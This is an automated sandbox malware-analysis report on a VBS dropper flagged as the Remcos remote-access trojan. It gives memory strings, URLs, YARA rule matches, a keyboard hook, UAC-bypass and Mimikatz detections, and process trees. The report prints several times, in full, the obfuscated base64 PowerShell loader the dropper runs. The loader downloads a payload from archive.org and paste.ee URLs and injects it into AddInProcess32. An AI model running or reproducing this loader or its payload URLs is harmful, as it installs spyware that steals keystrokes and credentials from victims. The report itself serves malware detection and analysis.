                  Source: powershell.exe, 00000002.00000002.1427139598.000001C4654D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: powershell.exe, 00000002.00000002.1427370499.000001C4671C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: powershell.exe, 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: wscript.exe, 00000000.00000003.1264393743.000001D788743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.dmt
                  Source: powershell.exe, 00000002.00000002.1429078475.000001C4672E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000002.00000002.1429078475.000001C467332000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                  Source: powershell.exe, 00000002.00000002.1429078475.000001C46734B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                  Source: powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arX
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E46AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
                  Source: powershell.exe, 00000006.00000002.1414917248.00000208FB430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVw3;w1Zbase64Content
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/nJcWp/0
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.11:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49706 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Installs a global keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
                  Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545915861.000000000268E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7360, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess Stats: CPU usage > 49%
                  Source: OIQ1ybtQdW.vbsInitial sample: Strings found which are bigger than 50
                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7360, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@8/6@4/3
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-DCR6HW
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yd2ofkty.lqr.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
